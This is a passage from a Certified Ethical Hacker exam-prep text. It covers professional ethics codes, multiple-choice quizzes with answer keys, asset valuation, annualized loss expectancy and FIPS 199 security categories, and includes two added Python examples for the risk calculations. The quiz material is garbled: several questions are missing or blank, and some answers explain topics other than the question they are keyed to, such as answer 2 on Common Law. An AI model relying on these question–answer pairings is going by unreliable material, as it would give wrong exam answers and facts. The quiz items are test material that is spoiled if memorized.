her/his experience and education. Ensure that she/he is qualified for any project on which he/she
works or proposes to work by an appropriate combination of education, training, and experience.
Never knowingly use software or process that is obtained or retained either illegally or unethically.
Not engage in deceptive financial practices such as bribery, double billing, or other improper
financial practices.
Use the property of a client or employer only in ways properly authorized, and with the owner's
knowledge and consent.
Disclose to all concerned parties those conflicts of interest that cannot reasonably be avoided or
escaped.
Ensure good management for any project he/she leads, including effective procedures for
promotion of quality and full disclosure of risk.
Add to the knowledge of the e-commerce profession by constant study, share the lessons of
her/his experience with fellow EC-Council members, and promote public awareness of benefits of
electronic commerce.
Conduct herself/himself in the most ethical and competent manner when soliciting professional
service or seeking employment, thus meriting confidence in her/his knowledge and integrity.
Ensure ethical conduct and professional care at all times on all professional assignments without
prejudice.
Not associate with malicious hackers nor engage in any malicious activities.
Not purposefully compromise or cause to be compromised the client organization's systems in
the course of your professional dealings.
Ensure all penetration testing activities are authorized and within legal limits.
Not partake in any black hat activity or be associated with any black hat community that serves to
endanger networks.
Not be part of any underground hacking community for purposes of preaching and expanding
black hat activities.
(ISC)2 Code of Ethics Canons
Protect society, the commonwealth, and the infrastructure.
Act honorably, honestly, justly, responsibly, and legally.
Provide diligent and competent service to the principals.
Advance and protect the profession.
That I have an obligation to my fellow members, therefore, I shall uphold the high ideals of
AITP as outlined in the Association Bylaws. Further, I shall cooperate with my fellow
members and shall treat them with honesty and respect at all times.
That I have an obligation to society and will participate to the best of my ability in the
dissemination of knowledge pertaining to the general development and understanding of
information processing. Further, I shall not use knowledge of a confidential nature to further
my personal interest, nor shall I violate the privacy and confidentiality of information
entrusted to me or to which I may gain access.
That I have an obligation to my College or University, therefore, I shall uphold its ethical and
moral principles.
That I have an obligation to my employer whose trust I hold, therefore, I shall endeavor to
discharge this obligation to the best of my ability, to guard my employer's interests, and to
advise him or her wisely and honestly.
That I have an obligation to my country, therefore, in my personal, business, and social
contacts, I shall uphold my nation and shall honor the chosen way of life of my fellow
citizens.
I accept these obligations as a personal responsibility and as a member of this Association. I
shall actively discharge these obligations and I dedicate myself to that end.
The Computer Ethics Institute's Ten Commandments of Computer Ethics
1. Thou shalt not use a computer to harm other people.
2. Thou shalt not interfere with other people's computer work.
3. Thou shalt not snoop around in other people's computer files.
4. Thou shalt not use a computer to steal.
5. Thou shalt not use a computer to bear false witness.
6. Thou shalt not copy or use proprietary software for which you have not paid.
7. Thou shalt not use other people's computer resources without authorization or the proper
compensation.
8. Thou shalt not appropriate other people's intellectual output.
9. Thou shalt think about the social consequences of the program you are writing for the
system you are designing.
10. Thou shalt use a computer in ways that ensure consideration and respect for your fellow
humans.
The Internet Architecture Board (IAB) Ethics and the Internet (RFC 1087)
Access to and use of the Internet is a privilege and should be treated as such by all users of the system. Any
activity is defined as unacceptable and unethical that purposely:
Seeks to gain unauthorized access to the resources of the Internet
Destroys the integrity of computer-based information
Disrupts the intended use of the Internet
Wastes resources such as people, capacity, and computers through such actions
Compromises the privacy of users
Involves negligence in the conduct of Internet-wide experiments
Assessment Questions
You can find the answers to the following questions in Appendix A.
1. According to the Internet Architecture Board (IAB), an activity that causes which of the
following is considered a violation of ethical behavior on the Internet?
a. Wasting resources
b. Appropriating other people's intellectual output
c. Copying proprietary software
d. Interfering with other people's computer work
2. Because the development of new technology usually outpaces the law, law enforcement
uses which traditional laws to prosecute computer criminals?
a. Copyright laws
b. Embezzlement, fraud, and wiretapping
c. Immigration laws
d. Warranties
4. In the United States, the legislative branch of government makes which type of law?
a. Administrative law
b. Statutory law
c. Common law
d. Regulatory law
5. A statutory law cited as 18 U.S.C. 1000 (1998) refers to which one of the following
references?
a. Rule 18, Title 1000 of the 1998 edition of the United States Code
b. Article 18, Section 1000 of the 1998 edition of the United States Code
c. Title 18, Section 1000 of the 1998 edition of the United States Code
d. Title 18, Section 1998 of Article 1000 of the United States Code
6. The three types of laws under the U.S. Common Law System are:
a. Civil (tort) law, copyright law, administrative/regulatory law
b. Civil (tort) law, criminal law, and administrative/regulatory law
c. Financial law, criminal law, and administrative/regulatory law
d. Civil (tort) law, criminal law, and financial law
7. Which one of the following factors is not taken into account in the amendment of
sentencing guidelines under 1030 relating to computer crime?
a. The computer skills and knowledge of the individual
b. The potential and actual loss resulting from the offense
c. The level of sophistication and planning involved in the offense
d. The extent to which the offense violated the privacy rights of individuals harmed
8. Access to personal information, choice to opt in or opt out, and notice regarding collection
of personal information are basic elements of what principles?
a. Security
b. Privacy
c. Administrative
d. Ethical
9. What legislation requires financial institutions to provide customers with clear descriptions
of the institution's policies and procedures for protecting the personal information of
customers?
a. Financial Services Modernization Act (Gramm-Leach-Bliley)
b. The 1973 U.S. Code of Fair Information Practices
c. The 2002 E-Government Act. Title III, the Federal Information Security
Management Act (FISMA)
d. Sarbanes-Oxley
10. U.S.C. 1029 deals with which one of the following areas?
a. Fraud Activity Associated with Computers
b. Interception of Wire, Oral, and Electronic Communications
c. Fraud Activity Associated with Access Devices
d. Communication Lines, Stations, or Systems
11. Standards of behavior and considerations of what is right or wrong are associated with
which one of the following?
a. Laws
b. Rules
c. Ethics
d. Feelings
12. Hackers justify their attacks on computers by which of the following reasons?
a. Exercising freedom of speech by writing viruses
b. Helping information to be free
c. Information system software should prevent causing harm
d. All of the above
13. Which one of the following items is not in the EC-Council Code of Ethics?
a. Protect the intellectual property of others by relying on her/his own innovation and
efforts, thus ensuring that all benefits vest with its originator
b. Use software or processes that are copied or downloaded from other sources if
done in an office environment
c. Disclose to appropriate persons or authorities potential dangers to any e-commerce
clients, the Internet community, or the public, that she/he reasonably believes to be
associated with a particular set or type of electronic transactions or related software
or hardware
d. Not engage in deceptive financial practices such as bribery, double billing, or other
improper financial practices
14. The Ten Commandments of Computer Ethics were developed by which one of the
following organizations?
a. The EC-Council
b. The IEEE/ACM
c. The Internet Architecture Board (IAB)
d. The Computer Ethics Institute
15. Which one of the following organizations stated Access to and use of the Internet is a
privilege and should be treated as such by all users of the system in their code of ethics?
a. The EC-Council
b. The IEEE/ACM
c. The Internet Architecture Board (IAB)
d. The Computer Ethics Institute
16. The Code of Federal Regulations (C.F.R.) categorizes which type of U.S. law?
a. Statutory
b. Administrative/regulatory
c. Common
d. Financial
17. Under U.S. Common Law, which type of law addresses damage or loss to an individual or
an organization? Punishment cannot include imprisonment, but consists of financial
awards comprised of punitive, compensatory, or statutory damages.
a. Criminal law
b. Civil law
c. Administrative/regulatory law
d. Financial law
18. Responsibility for handling computer crimes in the United States is assigned to:
a. The Federal Bureau of Investigation (FBI) and the Secret Service
b. The FBI only
c. The National Security Agency (NSA)
d. The Central Intelligence Agency (CIA)
19. In general, computer-based evidence is considered:
a. Conclusive
b. Circumstantial
c. Secondary
d. Hearsay
20. What set of rules invokes the prudent man rule that requires senior officials to perform
their duties with the care that ordinary, prudent people would exercise under similar
circumstances?
a. Computer Security Act
b. Federal Sentencing Guidelines
c. Organization for Economic Cooperation and Development (OECD) Guidelines
d. Digital Millennium Copyright Act (DMCA)
21. What legislative Act was written to provide a comprehensive framework for ensuring the
effectiveness of information security controls over information resources that support
Federal operations and assets?
a. U.S. Kennedy-Kassebaum Health Insurance and Portability Accountability Act
(HIPAA)
b. Digital Millennium Copyright Act (DMCA)
c. USA Provide Appropriate Tools Required to Intercept and Obstruct Terrorism
(PATRIOT) Act
d. The Federal Information Security Management Act (FISMA)
22. Information system hacking that has the potential to cause bodily harm or death can result
in which one of the following sentences?
a. Imprisonment for 1 to 10 years
b. Imprisonment for 1 year
c. Imprisonment from 20 years to life
d. Imprisonment for 5 years
23. What one of the following federal codes is not related to hacking activities?
a. 18 U.S.C. 2510
b. 18 U.S.C. 1029
c. 18 U.S.C. 1090
d. 18 U.S.C. 1030
24. Which of the following is not one of the Generally Accepted Systems Security Principles
(GASSP)?
a. Computer security is not constrained by societal factors.
b. Computer security supports the mission of the organization.
c. Computer security requires a comprehensive and integrated approach.
d. Computer security should be periodically reassessed.
25. Which one of the following items is not one of the privacy practices in the 1973 U.S. Code
of Fair Information Practices?
a. There must not be personal data recordkeeping systems whose very existence is
secret.
b. There must be a way for a person to find out what information about them is in a
record and how it is used.
c. An individual is not required to have the means to prevent information about them,
which was obtained for one purpose, from being used or made available for other
purposes without their consent.
d. Any organization creating, maintaining, using, or disseminating records of
identifiable personal data must ensure the reliability of the data for their intended
use and must take precautions to prevent misuses of that data.
26. Ethical behavior is a function of which of the following items?
a. Religion
b. Experience
c. Culture
d. All of the above
27. Which one of the following is not a characteristic of a Certified Ethical Hacker?
a. Is considered on the same professional level as non-certified personnel
b. Required to adhere to higher ethical standards than non-certified personnel
1. Answer: a
The correct answer is a. Answers b, c, and d are ethical considerations of other organizations.
2. Answer: c
Common Law is also practiced in the United Kingdom. The Civil Law System is used in France,
Germany, and Quebec.
3. Answer: b
4. Answer: b
The correct answer is b. Administrative agencies make administrative/regulatory law, and the
judicial branch produces common laws found in court decisions.
5. Answer: c
6. Answer: b
7. Answer: a
The correct answer is a. Answers b, c, and d are cited in the Cyber Security Enhancement Act of
2002. Additional cited areas are whether the offense was committed for purposes of commercial
advantage or private financial benefit, whether the offense involved a computer used by the
government in furtherance of national defense, national security, or the administration of justice,
whether the violation was intended to or had the effect of significantly interfering with or disrupting
a critical infrastructure, and whether the violation was intended to or had the effect of creating a
threat to public health or safety, or injury to any person.
8. Answer: b
9. Answer: a
10. Answer: c
The correct answer is c. Answer a refers to 18 U.S.C. 1030, answer b is 18 U.S.C. 2510, and
answer d is 18 U.S.C. 1362.
11. Answer: c
12. Answer: d
13. Answer: b
The correct answer is b. Software should be purchased and properly licensed and not copied
illegally from other sources.
14. Answer: d
15. Answer: c
16. Answer: b
17. Answer: b
18. Answer: a
19. Answer: d
The correct answer is d. Answer a refers to incontrovertible evidence; answer b refers to inference
from other, intermediate facts; and answer c refers to a copy of evidence or oral description of its
content.
20. Answer: b
21. Answer: d
22. Answer: c
23. Answer: c
The correct answer is c, a made-up distracter. Answer a is the code related to the interception of
wire, oral and electronic communications; answer b is the code related to fraud activity associated
with access devices; and answer d is fraud activity associated with computers.
24. Answer: a
The correct answer is a, a made-up distracter. The GASSP states that computer security is
constrained by societal factors.
25. Answer: c
The correct answer is c. On the contrary, an individual must have the means to prevent
information about them, which was obtained for one purpose, from being used or made available
for other purposes without their consent.
26. Answer: d
27. Answer: a
The correct answer is a. A Certified Ethical Hacker is held to higher professional, legal, and ethical
standards than non-certified personnel.
28. Answer: b
29. Answer: d
The correct answer is d, the Health Insurance and Portability Accountability Act.
Valuating Assets
When relating to a penetration test, business management typically focuses on protecting the critical
information assets of the organization. Consequently, it is important to identify the organization's most
valuable assets. Criteria for determining asset value include:
The sensitivity of the information held in the asset
The legal liability incurred by loss of information from the asset
The amount of sensitive information held in the asset
The loss of public confidence in the organization caused by compromise of information held by
the asset
The dependencies among the assets
The cost to protect the asset
The revenue generated by the asset
These criteria form a basis for justifying penetration testing in that ensuring the security of critical
organizational assets is an important consideration for the organization's customers. From a
customer's or potential customer's point of view, demonstrating that a variety of sound information
security-related measures are consistently practiced is an important factor in doing business with an
organization. Thus, penetration testing can be viewed as a component of marketing, operations,
income generation, and establishing customer loyalty. Typical customer concerns in doing business
with an organization include:
Is the information about my proprietary intellectual property being protected?
Is my financial information being protected?
Are my transaction records being protected?
Is billing and delivery information being protected?
Is information concerning any problems associated with the transaction and deliverables being
protected?
Is it easy to conduct business by means of a secure Intranet, including perusing available
products and services, placing and tracking orders, reviewing billing data, checking on shipping
dates, and so on?
o Routing
o Trusted Systems Testing
o Access Control Testing
o Password Cracking
o Containment Measures Testing
o Survivability Review
o Denial of Service Testing
o Security Policy Review
o Alert and Log Review
Communications Security Testing
o Posture Review
o PBX Review
o Voicemail Testing
o FAX Testing
o Modem Survey
o Remote Access Control Testing
o Voice over IP Testing
o X.25 Packet Switched Networks Testing
Wireless Security Testing
o Posture Review
o Electromagnetic Radiation (EMR) Testing
o 802.11 Wireless Networks Testing
o Bluetooth Networks Testing
o Wireless Input Device Testing
o Wireless Handheld Testing
o Cordless Communications Testing
o Wireless Surveillance Device Testing
o Wireless Transaction Device Testing
o RFID Testing
o Infrared Testing
o Privacy Review
Physical Security Testing
o Posture Review
o Access Controls Testing
o Perimeter Review
o Monitoring Review
o Alarm Response Review
o Location Review
o Environment Review
Validate the costs of the penetration test by obtaining cost estimates and quotes from a number
of qualified suppliers.
Determine the types of tools that will be used by the supplier in the penetration test. Will the tools
be custom developed by the testing organization, commercially developed, or open source tools?
Has the testing organization checked the tools to make sure they have not been infected and
could be a source of compromise to the information systems that will be under test? Are the
signatures in the tools up to date? How will the testing organization detect recently discovered
vulnerabilities in the tested system?
Confirm that the testing organization has a solid plan for conducting the test.
Ensure that the testing organization uses formal methodologies that meet or exceed industry
standard approaches, such as developed in the Open Source Security Testing Methodology
Manual (OSSTMM) and the CESG IT Health Check (CHECK) method.
Determine the format, clarity, completeness, and accuracy of the deliverable penetration test
reports and results briefing.
Obtain guarantees that the experienced professionals promised by the testing organization are
the actual personnel performing the testing and are not replaced by inexperienced individuals.
Ensure that the personnel performing the penetration testing are experienced, competent, and
hold relevant certifications.
Investigate to guarantee that the testing organization will keep confidential all items and
information relating to the penetration test.
Asset. An entity in the organization designated to be protected; the value of the asset has to be
estimated.
Vulnerability. A weakness or lack of a safeguard that can be exploited by a threat and cause
harm.
Safeguard. A control employed to reduce the risk associated with a specific threat or group of
threats.
Residual risk. The risk that remains after the implementation of controls. There is always a
residual risk because risk can never be completely eliminated.
One useful analysis in quantifying the justification for a penetration test is to calculate the Annualized
Loss Expectancy (ALE) if a critical asset is disabled or compromised by a malicious attack on an
organization's network and information resources. The ALE is calculated as follows:
ALE = Single Loss Expectancy (SLE) × Annualized Rate of Occurrence (ARO), where ALE is the
expected annual loss to an organization from a threat inflicting harm to an asset; SLE is the dollar
figure that represents an organization's loss from a single threat realized; and the ARO is the
estimated annual frequency of the single threat occurring.
For example, assume that an asset with a value of $500,000 is subject to a successful malicious
attack threat twice a year; the ALE is calculated as:
ALE = $500,000 × 2 = $1,000,000
If the asset has some protection and will not be totally taken out by the threat, the SLE can be
modified by an Exposure Factor that takes into account that the asset is not completely eliminated by
the threat. Formally, Exposure Factor (EF) is the percentage of loss that a realized threat event would
have on a specific asset. Therefore,
SLE = Asset Value × EF
Thus, in the previous example, if the $500,000 asset has an exposure of 40 percent to the threat, the
SLE is $500,000 × 0.40 = $200,000, and the ALE is:
ALE = $200,000 × 2 = $400,000
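To make the ALE arithmetic concrete, here is an added Python example (not code from the CEH Prep Guide) that applies the SLE and ALE formulas above to the figures in the text and then, going one step beyond the text, uses the same functions to compare the ALE before and after a hypothetical safeguard, which is how an ALE figure is normally turned into a cost justification. The safeguard's annual cost and its effect on the ARO are constructed values.

```python
"""Annualized Loss Expectancy (ALE) carried through in code.

Added example; it is not code from the CEH Prep Guide. It applies the
formulas given in the text (SLE = asset value x EF, ALE = SLE x ARO) to the
text's own numbers, then goes one step further than the text by comparing the
ALE before and after a hypothetical safeguard. All safeguard figures below
are constructed for illustration.
"""


def single_loss_expectancy(asset_value: float, exposure_factor: float = 1.0) -> float:
    """SLE in dollars: the loss from one realized threat event.

    exposure_factor (EF) is the fraction of the asset's value lost in a
    single event; 1.0 means the asset is completely taken out.
    """
    if not 0.0 <= exposure_factor <= 1.0:
        raise ValueError("EF must be a fraction between 0 and 1")
    if asset_value < 0:
        raise ValueError("asset value cannot be negative")
    return round(asset_value * exposure_factor, 2)


def annualized_loss_expectancy(sle: float, aro: float) -> float:
    """ALE = SLE x ARO.

    aro (Annualized Rate of Occurrence) is the expected number of events per
    year; it may be fractional, e.g. 0.1 for an event expected once a decade.
    """
    if aro < 0:
        raise ValueError("ARO cannot be negative")
    return round(sle * aro, 2)


def annual_safeguard_value(ale_before: float, ale_after: float, annual_cost: float) -> float:
    """Net annual value of a safeguard: the ALE it removes minus what it costs.

    A positive result means the control pays for itself on expected-loss
    grounds; a negative one means the organization would spend more on the
    control than the risk it reduces.
    """
    return round(ale_before - ale_after - annual_cost, 2)


def page_example() -> dict:
    """The two calculations from the text: a $500,000 asset attacked twice a
    year, first with no protection (EF = 1.0) and then with 40 percent exposure."""
    asset_value = 500_000
    aro = 2
    sle_total = single_loss_expectancy(asset_value)            # $500,000
    sle_partial = single_loss_expectancy(asset_value, 0.40)    # $200,000
    return {
        "ale_no_protection": annualized_loss_expectancy(sle_total, aro),   # $1,000,000
        "sle_with_ef": sle_partial,
        "ale_with_ef": annualized_loss_expectancy(sle_partial, aro),      # $400,000
    }


def safeguard_example() -> dict:
    """Constructed extension (hypothetical figures): suppose a control such as
    better monitoring and patching is expected to cut the ARO from 2 to 0.5 and
    costs $150,000 a year. The asset and EF are those of the text's second example."""
    sle = single_loss_expectancy(500_000, 0.40)
    ale_before = annualized_loss_expectancy(sle, 2)
    ale_after = annualized_loss_expectancy(sle, 0.5)
    value = annual_safeguard_value(ale_before, ale_after, annual_cost=150_000)
    return {"ale_before": ale_before, "ale_after": ale_after, "net_annual_value": value}


if __name__ == "__main__":
    for name, figures in (("text example", page_example()), ("safeguard", safeguard_example())):
        print(name)
        for label, dollars in figures.items():
            print(f"  {label:>20}: ${dollars:,.2f}")
```

Running the script reproduces the $1,000,000 and $400,000 figures from the text; the safeguard comparison shows the kind of number business management actually decides on, the expected loss avoided per year net of the control's cost.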
Natural threats listed in the table: Tornadoes, Floods, Snowstorms, Ice, Thunderstorms, Avalanches,
Organisms, Forest fires.
Attack classes listed in the table (descriptions not recovered): Passive, Active, Close-in, Insider,
Distribution.
As with other metrics in evaluating the performance of an organization, business management
requires a measure of the impact of a threat realized on the organization's network and information
system. One popular and useful approach to impact characteristics is provided by the National
Institute of Standards and Technology (NIST) Federal Information Processing Publication (FIPS) 199,
Standards for Security Categorization of Federal Information and Information Systems.
FIPS 199 defines three levels of potential impact of a threat realized on the security objectives of
confidentiality, integrity, and availability. Table 3-2 provides these impact definitions.
Table 3-2: Impact Definitions for Security Objectives
SECURITY OBJECTIVE: Confidentiality. Preserving authorized restrictions on information access and
disclosure, including means for protecting personal privacy and proprietary information. [44 U.S.C.,
SEC. 3542]
LOW: The unauthorized disclosure of information could be expected to have a limited adverse effect on
organizational operations, organizational assets, or individuals.
MODERATE: The unauthorized disclosure of information could be expected to have a serious adverse
effect on organizational operations, organizational assets, or individuals.
HIGH: The unauthorized disclosure of information could be expected to have a severe or catastrophic
adverse effect on organizational operations, organizational assets, or individuals.
SECURITY OBJECTIVE: Integrity. Guarding against improper information modification or destruction, and
includes ensuring information nonrepudiation and authenticity. [44 U.S.C., SEC. 3542]
LOW: The unauthorized modification or destruction of information could be expected to have a limited
adverse effect on organizational operations, organizational assets, or individuals.
MODERATE: The unauthorized modification or destruction of information could be expected to have a
serious adverse effect on organizational operations, organizational assets, or individuals.
HIGH: The unauthorized modification or destruction of information could be expected to have a severe
or catastrophic adverse effect on organizational operations, organizational assets, or individuals.
SECURITY OBJECTIVE: Availability. Ensuring timely and reliable access to and use of information.
[44 U.S.C., SEC. 3542]
LOW: The disruption of access to or use of information or an information system could be expected to
have a limited adverse effect on organizational operations, organizational assets, or individuals.
MODERATE: The disruption of access to or use of information or an information system could be
expected to have a serious adverse effect on organizational operations, organizational assets, or
individuals.
HIGH: The disruption of access to or use of information or an information system could be expected to
have a severe or catastrophic adverse effect on organizational operations, organizational assets, or
individuals.
FIPS 199 also defines a security category (SC) as a function of the potential impact on information or
information systems should a threat successfully exploit a vulnerability in the system. A security
category can apply to information types and information systems.
The general formula developed in FIPS Pub 199 for defining a security category of an information
type is:
SC information type = {(confidentiality, impact), (integrity, impact), (availability, impact)},
where the acceptable values for potential impact are LOW, MODERATE, HIGH, or NOT
APPLICABLE.
For example, if the payroll department of an organization determines that there is a high potential
impact from a loss of confidentiality, a high potential impact from a loss of integrity, and a moderate
potential impact from a loss of availability, the security category, SC, of this information type would be:
SC payroll information = {(confidentiality, HIGH), (integrity, HIGH), (availability, MODERATE)}.
For information systems, the corresponding formula is:
SC information system = {(confidentiality, impact), (integrity, impact), (availability, impact)},
where the acceptable values for potential impact are LOW, MODERATE, or HIGH.
A value of NOT APPLICABLE cannot be applied to an impact level of an information system. To
develop a category for an information system, the potential impact values assigned to the security
objectives of confidentiality, integrity, and availability must be the maximum (worst case) values
assigned among the security categories that have been assigned to the different types of information
residing on the system.
For example, suppose a health care provider has billing information for patients, including their
treatment type and personal information, residing on a billing information system. The CIO determines
that for these records, the potential impact from a loss of confidentiality is high, the potential impact
from a loss of integrity is high, and the potential impact from a loss of availability is moderate.
The corresponding security category, SC, would be expressed as:
SC billing information = {(confidentiality, HIGH), (integrity, HIGH), (availability, MODERATE)}
Now, assume that the same billing information system also supports some of the health care
organization's administrative functions and has the following SC for the administrative information:
SC administrative information = {(confidentiality, LOW), (integrity, HIGH), (availability, LOW)}
The security category of the acquisition information system would comprise the highest values of the
two information categories resident on the system. Therefore, the SC would be:
SC billing information system = {(confidentiality, HIGH), (integrity, HIGH), (availability, MODERATE)}.
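The aggregation rule just described (each objective of a system takes the worst-case impact among the information types it holds, and NOT APPLICABLE is valid only for an information type), as an added example that is not code from the book or from NIST. The floor to LOW when every type rates an objective NOT APPLICABLE is FIPS 199's stated minimum for a system and is an assumption beyond what the text quotes; the billing-system data is the example from the text.

```python
"""Security categorization of information types and systems under FIPS 199.

Added example, not code from the book: it implements the high-water-mark
rule the text describes for deriving a system's SC from its information types.
"""

OBJECTIVES = ("confidentiality", "integrity", "availability")

# Ordering used to pick the worst case. NOT APPLICABLE is allowed only for an
# information type, never for an information system.
_RANK = {"NOT APPLICABLE": 0, "LOW": 1, "MODERATE": 2, "HIGH": 3}
_SYSTEM_LEVELS = ("LOW", "MODERATE", "HIGH")


def validate_category(sc, is_system=False):
    """Raise ValueError if sc is not a well-formed security category."""
    missing = [o for o in OBJECTIVES if o not in sc]
    if missing:
        raise ValueError(f"missing security objective(s): {missing}")
    for objective, impact in sc.items():
        if objective not in OBJECTIVES:
            raise ValueError(f"unknown security objective: {objective}")
        if impact not in _RANK:
            raise ValueError(f"invalid impact level {impact!r} for {objective}")
        if is_system and impact not in _SYSTEM_LEVELS:
            raise ValueError(
                f"{impact} cannot be applied to an information system ({objective})")


def system_category(info_types):
    """Derive the SC of an information system from its information types.

    info_types maps an information type name to its security category, e.g.
    {"billing information": {"confidentiality": "HIGH", ...}, ...}.
    Each objective takes the highest impact found among the information
    types (the worst case). If every type rates an objective NOT APPLICABLE,
    the system value is floored to LOW: FIPS 199 gives LOW as the minimum
    impact level for a system (an assumption beyond what the text quotes).
    """
    if not info_types:
        raise ValueError("a system must hold at least one information type")
    for sc in info_types.values():
        validate_category(sc)
    result = {}
    for objective in OBJECTIVES:
        worst = max(info_types.values(),
                    key=lambda sc: _RANK[sc[objective]])[objective]
        result[objective] = worst if worst != "NOT APPLICABLE" else "LOW"
    validate_category(result, is_system=True)
    return result


def format_category(label, sc):
    """Render a category in the book's notation:
    SC payroll information = {(confidentiality, HIGH), ...}."""
    pairs = ", ".join(f"({o}, {sc[o]})" for o in OBJECTIVES)
    return f"SC {label} = {{{pairs}}}"


# Constructed data: the health care billing system described in the text.
BILLING_SYSTEM = {
    "billing information": {
        "confidentiality": "HIGH", "integrity": "HIGH", "availability": "MODERATE"},
    "administrative information": {
        "confidentiality": "LOW", "integrity": "HIGH", "availability": "LOW"},
}

if __name__ == "__main__":
    for name, sc in BILLING_SYSTEM.items():
        print(format_category(name, sc))
    print(format_category("billing information system",
                          system_category(BILLING_SYSTEM)))
```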
Three choices are available to management regarding risk. One option is to use penetration tests as a
component of a risk management program that uses controls and safeguards to reduce risk. The
second choice is to transfer the risk to another organization such as an insurance company. The third
approach is to accept the status quo risk and accept the losses that might occur. Obviously, the latter
choice is problematic. The other two are reasonable options, but the risk reduction approach is the
most prudent of the three and demonstrates due care taken by corporate management.
NIST SP 800-30, Risk Management Guide for Information Technology Systems, provides a risk
mitigation strategy as shown in Figure 3-2.
Assessment Questions
You can find the answers to the following questions in Appendix A.
1. In general, why is it difficult to justify the value of a penetration test in terms of return on
investment (ROI)?
a. IT systems and information systems security are usually viewed as cost centers.
b. IT systems and information systems security are usually viewed as profit centers.
c. IT systems and information systems security are usually viewed as revenue generators.
d. IT systems and information systems security are not related to penetration tests.
2.
3. Which one of the following items is not a benefit that can result from penetration testing?
a. Mitigation of risk
b. Increasing system vulnerabilities
c. Correcting design flaws
d. Correcting vulnerabilities
4. Which one of the following activities is not a step in a typical penetration test?
a. Determine operating system
b. Identify network topology
c. Determine risk
d. Determine costs of controls
5. Which one of the following is not a criterion for determining the value of an organization's
asset?
a. The number of upgrades to the asset
b. Legal liability incurred by loss of information from the asset
c. The sensitivity of the information held in the asset
d. The dependencies among the assets
6.
7. Which one of the following is not a typical customer concern in doing business with an
organization?
a. Is billing and delivery information being protected?
b. Is my advertising budget being exceeded?
c. Is my proprietary intellectual property information being protected?
d. Is my financial information being protected?
8. Which one of the following lists is not part of typical penetration tests?
a. Acquire information, penetrate and attack the network, and cover tracks
b. Develop a plan, acquire information, and generate report
c. Conduct enumeration, vulnerability analysis, and exploit the network
d. Exercise due care, implement separation of duties, and increase thresholds
9. Which one of the following relationship pairs describing types of penetration tests is
incorrect?
a. Full knowledge - Whitebox
b. Partial knowledge - Graybox
c. Minimum knowledge - Blackbox
d. Zero knowledge - Blackbox
10. Which one of the following areas is not listed as a major heading in the Open Source Security Testing Methodology Manual (OSSTMM)?
a. Information Security Testing
b. Internet Technology Security Testing
c. Script Security Testing
d. Wireless Security Testing
11. The following subheadings are listed under which major heading in the Open Source Security Testing Methodology Manual (OSSTMM)?
Access Controls Testing, Perimeter Review, Alarm Response Review, and Location
Review
a. Physical Security Testing
b. Script Security Testing
c. Communications Security Testing
d. Process Security Testing
12. Which one of the following items is not a valid choice for an organization to consider when
choosing a supplier to conduct penetration testing?
a. Ensure that the penetration testing organization has the appropriate experience
and expertise to perform the required tasks.
b. To ensure that the testing is authentic, request that the supplier employ former
malicious hackers as part of the testing team.
c. Investigate to be certain that the testing organization provides the specific set of
services that your organization desires.
d. Have the penetration testing organization sign an agreement to include liability for
any harm that occurs during the test, including accidents and negligence.
13. Identifying critical assets, the corresponding threats to these assets, the estimated
frequency of occurrence of the threats, and the impact of the threats realized defines what
activity?
a. Risk analysis
b. Threat analysis
c. Security analysis
d. Testing analysis
14. An entity in the organization that is designated to be protected is the definition of which
one of the following terms?
a. Vulnerability
b. Safeguard
c. Asset
d. Control
15. A weakness or lack of a safeguard that can be exploited by a threat and cause harm is
which one of the following?
a. Vulnerability
b. Residual risk
c. Safeguard
d. Asset
16. The risk that remains after the implementation of controls is called:
a. Vulnerability
b. Residual risk
c. Weakness
d. Threat
17. The expected annual loss to an organization from a threat inflicting harm to an asset is
called the:
a. Single Loss Expectancy (SLE)
b. Annualized Rate of Occurrence (ARO)
c. Annualized Rate of Loss (ARL)
d. Annualized Loss Expectancy (ALE)
18. The Single Loss Expectancy (SLE) is calculated as:
a. Annualized Rate of Occurrence (ARO) × Exposure Factor (EF)
b. Asset Value × Exposure Factor (EF)
c. Asset Value × Annualized Rate of Occurrence (ARO)
d. Annualized Loss Expectancy (ALE) × Exposure Factor (EF)
19. The Annualized Loss Expectancy (ALE) is calculated as:
a. Single Loss Expectancy (SLE) × Exposure Factor (EF)
b. Exposure Factor (EF) × Annualized Rate of Occurrence (ARO)
c. Single Loss Expectancy (SLE) × Asset Value
d. Single Loss Expectancy (SLE) × Annualized Rate of Occurrence (ARO)
20. Which one of the following items is not one of the steps in performing a risk analysis?
a. Determine the value of assets in order to estimate potential loss amounts.
a. Confidentiality
b. Integrity
c. Availability
d. Accountability
28. NIST FIPS 199 defines a security category (SC) as which one of the following?
a. A function of the vulnerabilities in an information system should a threat
successfully exploit the system
b. A function of the safeguards in an information system should a threat successfully
exploit a vulnerability in the system
c. A function of the potential impact on information or information systems should a
threat successfully exploit a vulnerability in the system
d. A function of the controls in an information system should a threat successfully
exploit a vulnerability in the system
29. The general formula developed in FIPS Pub 199 for defining a security category of an
information type is which one of the following?
a. SC information type = {(confidentiality, impact), (integrity, impact), (accountability,
impact)}
b. SC information type = {(confidentiality, impact), (integrity, impact), (availability,
impact)}
c. SC information type = {(confidentiality, threat), (integrity, threat), (availability, threat)}
d. SC information type = {(authenticity, impact), (integrity, impact), (availability, impact)}
30. What role(s) in an organization are responsible for meeting the requirements of
reasonable care for legal liability for the corporate entity and providing supporting
resources relating to penetration testing and other information system security activities?
a. Senior organization officers
b. Business unit managers
c. Information and data owners
d. Security awareness training personnel
31. Which one of the following choices is not a valid option for management regarding risk?
a. Accept the existing risk, and accept the losses that might occur.
b. Transfer risk to another organization such as an insurance company.
c. Use penetration tests as a component of a risk management program that uses
controls and safeguards to reduce risk.
d. Use required controls and safeguards to eliminate risk completely.
Answers
1. Answer: a
The correct answer is a. IT systems and information system security are usually viewed as
consuming revenue and not directly generating revenue. CIOs and CSOs have to position
penetration testing as a critical component of important revenue generating efforts.
2. Answer: d
3. Answer: b
4. Answer: d
The correct answer is d. This action is performed after the penetration test if controls are selected
for mitigating risk.
5. Answer: a
6. Answer: c
7. Answer: b
8. Answer: d
9. Answer: c
10. Answer: c
11. Answer: a
12. Answer: b
The correct answer is b. An organization should avoid penetration-testing organizations that
employ former malicious hackers.
13. Answer: a
14. Answer: c
15. Answer: a
16. Answer: b
17. Answer: d
18. Answer: b
19. Answer: d
20. Answer: c
21. Answer: a
22. Answer: b
23. Answer: a
24. Answer: b
25. Answer: c
The correct answer is c. Answer a describes a close-in attack, answer b is an insider attack, and
answer d refers to a passive attack.
26. Answer: c
27. Answer: a
28. Answer: c
29. Answer: b
30. Answer: a
31. Answer: d
Risk can never be completely eliminated.
Chapter 4: Footprinting
Overview
